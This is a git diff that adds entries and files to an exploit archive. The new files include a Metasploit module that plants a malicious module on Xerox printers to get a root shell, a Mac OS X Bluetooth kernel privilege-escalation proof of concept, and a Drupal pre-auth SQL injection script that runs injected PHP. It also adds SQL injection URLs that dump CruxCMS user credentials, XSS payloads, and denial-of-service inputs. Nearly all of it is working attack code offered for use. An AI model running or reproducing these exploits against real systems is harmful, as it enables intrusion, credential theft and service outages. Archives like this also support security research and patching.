diff --git a/files.csv b/files.csv index f46a26c55..497694870 100755 --- a/files.csv +++ b/files.csv @@ -31660,3 +31660,11 @@ id,file,description,date,author,platform,type,port 35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 'range' Parameter SQL Injection Vulnerability",2010-12-27,Dr.NeT,php,webapps,0 35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 'Track' Module 'server.php' Cross Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0 +35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 +35151,platforms/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) ""Patch"" DLM Vulnerability",2014-11-03,metasploit,hardware,remote,9100 +35153,platforms/osx/dos/35153.c,"Mac OS X Mavericks IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0 +35154,platforms/asp/webapps/35154.txt,"Sigma Portal 'ShowObjectPicture.aspx' Denial of Service Vulnerability",2010-12-27,"Pouya Daneshmand",asp,webapps,0 +35155,platforms/php/webapps/35155.txt,"CruxCMS 3.0 Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,php,webapps,0 +35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0 +35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0 +35158,platforms/windows/dos/35158.py,"Mongoose 2.11 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0 diff --git a/platforms/asp/webapps/35154.txt b/platforms/asp/webapps/35154.txt new file mode 100755 index 000000000..c1a1cd77b --- /dev/null +++ b/platforms/asp/webapps/35154.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/45588/info + +Sigma Portal is prone to a denial-of-service vulnerability. + +Attackers can exploit this issue to cause the server to consume excessive resources, denying service to legitimate users. + +http://www.example.com/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID) \ No newline at end of file diff --git a/platforms/hardware/remote/35151.rb b/platforms/hardware/remote/35151.rb new file mode 100755 index 000000000..1e61b384d --- /dev/null +++ b/platforms/hardware/remote/35151.rb @@ -0,0 +1,98 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + Rank = GoodRanking + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability', + 'Description' => %{ + This module exploits a vulnerability found in Xerox Multifunction Printers (MFP). By + supplying a modified Dynamic Loadable Module (DLM), it is possible to execute arbitrary + commands under root priviages. + }, + 'Author' => + [ + 'Deral "Percentx" Heiland', + 'Pete "Bokojan" Arzamendi' + ], + 'References' => + [ + ['BID', '52483'], + ['URL', 'http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf'], + ['URL', 'http://foofus.net/goons/percx/Xerox_hack.pdf'] + ], + 'Privileged' => true, + 'License' => MSF_LICENSE, + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 512, + 'Compat' => + { + 'PayloadType' => 'cmd cmd_bash', + 'RequiredCmd' => 'generic bash-tcp' + } + }, + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'Targets' => [['Automatic', {}]], + 'DisclosureDate' => 'Mar 07 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(9100) + ], self.class) + end + + def exploit + print_status("#{rhost}:#{rport} - Sending print job...") + firmcode = '%%XRXbegin' + "\x0A" + firmcode << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0A" + firmcode << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0A" + firmcode << '%%OID_ATT_JOB_COMMENT "PraedaPWN2014:' + "#{payload.encoded}" + ':"' + "\x0A" + firmcode << '%%OID_ATT_JOB_COMMENT "patch"' + "\x0A" + firmcode << '%%OID_ATT_DLM_NAME "xerox"' + "\x0A" + firmcode << '%%OID_ATT_DLM_VERSION "NO_DLM_VERSION_CHECK"' + "\x0A" + firmcode << '%%OID_ATT_DLM_SIGNATURE "ca361047da56db9dd81fee6a23ff875facc3df0e1153d325c2d217c0e75f861b"' + "\x0A" + firmcode << '%%OID_ATT_DLM_EXTRACTION_CRITERIA "extract /tmp/xerox.dnld"' + "\x0A" + firmcode << '%%XRXend' + "\x0A\x1F\x8B\x08\x00\xB1\x8B\x49\x54\x00\x03\xED" + firmcode << "\xD3\x41\x4B\xC3\x30\x14\x07\xF0\x9E\xFB\x29\xFE\xE2\x60\x20\x74" + firmcode << "\x69\x63\x37\x61\x5A\xBC\x79\x94\xDD\x3C\xC8\xA0\x59\x9B\xDA\x4A" + firmcode << "\xD7\xCC\xB4\xD3\x1D\xF6\xE1\x8D\xDD\x64\xB8\x83\x3B\x0D\x11\xFE" + firmcode << "\xBF\x43\x03\xAF\x2F\xEF\xBD\xB4\x64\xA3\xAD\xD9\x8C\xDA\xD2\x3B" + firmcode << "\xA3\xD0\xB9\x19\x8F\xFB\xD5\x39\x5E\xC3\x58\x4E\xBC\x48\xC6\x52" + firmcode << "\x5E\x87\xE3\x89\x8C\xBD\x30\x8A\xE4\x44\x7A\x08\xCF\x39\xD4\xB7" + firmcode << "\x75\xDB\x29\x0B\x78\xD6\x98\xEE\xB7\xBC\x53\xEF\xFF\xA9\xCB\x0B" + firmcode << "\xB1\xA8\x1A\xB1\x50\x6D\xE9\x17\x55\x9D\xA4\x2F\x56\xAF\x10\xD4" + firmcode << "\x08\x1E\x30\x9C\x59\xA5\x73\x35\x7B\x7A\x94\x61\x14\x0F\x21\xDE" + firmcode << "\x95\x15\xED\xCA\x98\x5A\x34\x99\x68\x74\x27\x5E\xCD\x62\x7A\x35" + firmcode << "\x8A\x52\xBF\x2A\xF0\x8C\xA0\xC0\xC0\xD5\xC0\xDC\xEF\x4A\xDD\xF8" + firmcode << "\xC0\x47\x59\xD5\x1A\x56\xAB\x1C\x75\xD5\x68\x17\xC9\x8D\x7B\x00" + firmcode << "\x3A\x2B\x0D\x06\x5F\x31\x6C\xB1\xEB\xF8\x06\xFC\x68\xD7\xE7\xF5" + firmcode << "\x65\x07\xF7\x48\x12\x84\x98\xDF\x62\x5F\x17\xC8\xCC\x72\xA9\x9A" + firmcode << "\x3C\x49\x0F\x95\xB6\xD9\xBA\x43\x90\x4F\xDD\x18\x32\xED\x93\x8A" + firmcode << "\xAA\xEF\xE8\x9A\xDC\xF5\x83\xF9\xBB\xE4\xFD\xDE\xED\xE1\xE0\x76" + firmcode << "\x89\x91\xD8\xEC\x6F\x82\xFB\x0C\xFE\x5F\xFF\x15\x22\x22\x22\x22" + firmcode << "\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\xA2\xD3\x3E" + firmcode << "\x01\x5A\x18\x54\xBB\x00\x28\x00\x00" + + begin + connect + sock.put(firmcode) + handler + rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse => e + print_error("#{rhost}:#{rport} - #{e.message}") + ensure + disconnect + end + end +end \ No newline at end of file diff --git a/platforms/osx/dos/35153.c b/platforms/osx/dos/35153.c new file mode 100755 index 000000000..96f19d37b --- /dev/null +++ b/platforms/osx/dos/35153.c @@ -0,0 +1,92 @@ +/* + * pwn.c, by @rpaleari and @joystick + * + * This PoC exploits a missing sign check in + * IOBluetoothHCIUserClient::SimpleDispatchWL(). + * + * Tested on Mac OS X Mavericks (10.9.4/10.9.5). + * + * Compile with: gcc -Wall -o pwn{,.c} -framework IOKit + * + */ + +#include +#include +#include +#include + +#include + +uint64_t payload() { + /* Your payload goes here. */ +} + +int main(void) { + /* Map our landing page (kernel will jump at tgt+7) */ + vm_address_t tgt = 0x0000048800000000; + vm_allocate(mach_task_self(), &tgt, 0x1000, 0); + vm_protect(mach_task_self(), tgt, 0x1000, 0, + VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE); + memset((void *)tgt, 0, 0x1000); + + /* Prepare payload */ + char *target = (char *)tgt; + + /* mov rax, payload */ + target[7] = 0x48; + target[8] = 0xb8; + *((uint64_t *)(&target[9])) = (uint64_t) payload; + + /* jmp rax */ + target[17] = 0xff; + target[18] = 0xe0; + + printf(" [+] Payload function @ %016llx\n", (uint64_t) payload); + printf(" [+] Stored trampoline @ %016llx\n", (uint64_t) tgt+7); + + /* Find the vulnerable service */ + io_service_t service = + IOServiceGetMatchingService(kIOMasterPortDefault, + IOServiceMatching("IOBluetoothHCIController")); + + if (!service) { + return -1; + } + + /* Connect to the vulnerable service */ + io_connect_t port = (io_connect_t) 0; + kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); + IOObjectRelease(service); + if (kr != kIOReturnSuccess) { + return kr; + } + + printf(" [+] Opened connection to service on port: %d\n", port); + + /* The first 8 bytes must be 0, so we don't have to handle following + parameters */ + char a[] = "\x00\x00\x00\x00\x00\x00\x00\x00" + /* Don't really matter for the exploit (ignored due to the 0s above) */ + "\x00\x00\x00\x00\x00\x00\x00\x07\x02\x00\x00\x00\x11\x0a\x00\x00\x03\x72\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xfa\x2a\x54\xff\x7f\x00\x00\x78\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\xa8\xfb\x2a\x54\xff\x7f\x00\x00\xd8\xfa\x2a\x54\xff\x7f\x00\x00\x60\x4a\xb6\x86" + "\x80\xff\xff\xff" + /* Index value 0xfff5b6a8 makes _sRoutines[index] point to an in-kernel + memory area that contains {0x0000048800000007, N}, with 0 <= N < 8. May + need to be adjusted on other Mavericks versions. */ + "\xa8\xb6\xf5\xff\x80\xff\xff\xff"; + + printf(" [+] Launching exploit!\n"); + kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ + (uint32_t) 0, /* Selector */ + NULL, 0, /* input, inputCnt */ + (const void*) a, /* inputStruct */ + sizeof(a), /* inputStructCnt */ + NULL, NULL, NULL, NULL); /* Output stuff */ + + /* Exec shell here after payload returns */ + + return IOServiceClose(port); +} \ No newline at end of file diff --git a/platforms/php/webapps/35150.php b/platforms/php/webapps/35150.php new file mode 100755 index 000000000..8b17bfef4 --- /dev/null +++ b/platforms/php/webapps/35150.php @@ -0,0 +1,86 @@ + +// and Stefan Esser +//· + +include 'common.inc'; +include 'password.inc'; + +// set values +$user_id = 0; +$user_name = ''; + +$code_inject = 'phpinfo();session_destroy();die("");'; + +$url = isset($argv[1])?$argv[1]:''; +$code = isset($argv[2])?$argv[2]:''; + +if ($url == '-h') { + echo "usage:\n"; + echo $argv[0].' $url [$code|$file]'."\n"; + die(); +} + +if (empty($url) || strpos($url,'https') === False) { + echo "please state the cookie url. It works only with https urls.\n"; + die(); +} + +if (!empty($code)) { + if (is_file($code)) { + $code_inject = str_replace('<'.'?','',str_replace('<'.'?php','',str_replace('?'.'>','',file_get_contents($code)))); + } else { + $code_inject = $code; + } +} + +$code_inject = rtrim($code_inject,';'); +$code_inject .= ';session_destroy();die("");'; + +if (strpos($url, 'www.') === 0) { + $url = substr($url, 4); +} + +$_SESSION= array('a'=>'eval(base64_decode("'.base64_encode($code_inject).'"))','build_info' => array(), 'wrapper_callback' => 'form_execute_handlers', '#Array' => array('array_filter'), 'string' => 'assert'); +$_SESSION['build_info']['args'][0] = &$_SESSION['string']; + +list( , $session_name) = explode('://', $url, 2); + +// use insecure cookie with sql inj. +$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32); +$password = user_hash_password('test'); + +$session_id = drupal_random_key(); +$sec_ssid = drupal_random_key(); + +$serial = str_replace('}','CURLYCLOSE',str_replace('{','CURLYOPEN',"batch_form_state|".serialize($_SESSION))); +$inject = "UNION SELECT $user_id,'$user_name','$password','','','',null,0,0,0,1,null,'',0,'',null,$user_id,'$session_id','','127.0.0.1',0,0,REPLACE(REPLACE('".$serial."','CURLYCLOSE',CHAR(".ord('}').")),'CURLYOPEN',CHAR(".ord('{').")) -- "; + +$cookie = $cookieName.'[test+'.urlencode($inject).']='.$session_id.'; '.$cookieName.'[test]='.$session_id.'; S'.$cookieName.'='.$sec_ssid; + +$ch = curl_init($url); + +curl_setopt($ch,CURLOPT_HEADER,True); +curl_setopt($ch,CURLOPT_RETURNTRANSFER,True); +curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,False); +curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0'); + +curl_setopt($ch,CURLOPT_HTTPHEADER,array( + 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language: en-US,en;q=0.5' +)); + +curl_setopt($ch,CURLOPT_COOKIE,$cookie); + +$output = curl_exec($ch); + +curl_close($ch); + +echo $output; \ No newline at end of file diff --git a/platforms/php/webapps/35155.txt b/platforms/php/webapps/35155.txt new file mode 100755 index 000000000..41e998579 --- /dev/null +++ b/platforms/php/webapps/35155.txt @@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/45594/info + +CruxCMS is prone to multiple input-validation vulnerabilities, including multiple security-bypass issues, multiple arbitrary-file-upload issues, multiple SQL-injection issues, a local file-include issue, a cross-site-scripting issue and multiple information-disclosure issues. These issues occur because the application fails to properly sanitize user-supplied input. + +Exploiting these issues may allow an unauthorized user to view files and execute local scripts, execute arbitrary script code, bypass certain security restrictions, access or modify data, exploit latent vulnerabilities in the underlying database, gain administrative access, steal cookie-based authentication credentials, and launch other attacks. + +CruxCMS 3.0.0 is vulnerable; other versions may also be affected. + +http://www.example.com/cruxcms.3.0.0/search.php?search=_&max=1+UNION+ALL+SELECT+1,CONCAT_WS(0x3a,Id,Name,Password,Email,Admin),1,1+FROM+cruxcms_users +http://www.example.com/cruxcms.3.0.0/links.php?max=1+UNION+ALL+SELECT+1,1,CONCAT_WS(0x3a,Id,Name,Password,Email,Admin),1,0x596573+FROM+cruxcms_users +http://www.example.com/cruxcms.3.0.0/includes/template.php?style=../white.gif +http://www.example.com/cruxcms.3.0.0/manager/login.php?message= +http://www.example.com/cruxcms.3.0.0/manager/switcher.php?style[] +http://www.example.com/cruxcms.3.0.0/search.php?search[] +http://www.example.com/cruxcms.3.0.0/manager/filetypes.php +http://www.example.com/cruxcms.3.0.0/styles/andreas01.php \ No newline at end of file diff --git a/platforms/php/webapps/35156.txt b/platforms/php/webapps/35156.txt new file mode 100755 index 000000000..5f97414d3 --- /dev/null +++ b/platforms/php/webapps/35156.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/45600/info + +Coppermine Photo Gallery is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Coppermine Photo Gallery 1.5.10 is vulnerable; other versions may also be affected. + +http://www.example.com/cpg.1.5.10/help.php?base=1 +&h=czozMzoiPHNjcmlwdD5hbGVydCgnaGVhZGVyJyk7PC9zY3JpcHQ%2bIjs +&t=czozMToiPHNjcmlwdD5hbGVydCgndGV4dCcpOzwvc2NyaXB0PiI7 \ No newline at end of file diff --git a/platforms/php/webapps/35157.html b/platforms/php/webapps/35157.html new file mode 100755 index 000000000..8daaca43f --- /dev/null +++ b/platforms/php/webapps/35157.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45600/info + +Coppermine Photo Gallery is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Coppermine Photo Gallery 1.5.10 is vulnerable; other versions may also be affected. + +
\ No newline at end of file diff --git a/platforms/windows/dos/35158.py b/platforms/windows/dos/35158.py new file mode 100755 index 000000000..aa9e0e7dd --- /dev/null +++ b/platforms/windows/dos/35158.py @@ -0,0 +1,19 @@ +source: http://www.securityfocus.com/bid/45602/info + +Mongoose is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted input. + +Successfully exploiting this issue will allow an attacker to crash the affected application, denying further service to legitimate users. + +Mongoose 2.11 is vulnerable; other versions may also be affected. + +import socket + +host = 'localhost' +port = 8080 + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.settimeout(8) +s.connect((host, port)) +s.send('GET / HTTP/1.1\r\n' + 'Host: ' + host + '\r\n' + 'Content-Length: -2147483648\r\n\r\n') \ No newline at end of file